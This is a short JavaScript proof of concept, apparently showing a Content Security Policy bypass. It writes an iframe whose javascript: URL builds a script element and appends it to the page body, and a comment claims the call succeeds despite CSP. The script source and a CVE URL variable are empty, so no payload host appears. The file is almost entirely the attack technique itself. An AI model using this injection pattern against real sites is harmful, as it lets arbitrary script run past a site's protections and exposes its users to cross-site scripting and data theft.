  1. /* this is a script that pops an alert message */
  2. top._CVE_URL = '';
  4. /* this call will succeed although CSP */
  5. document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"\";document.body.appendChild(s);'></iframe>";

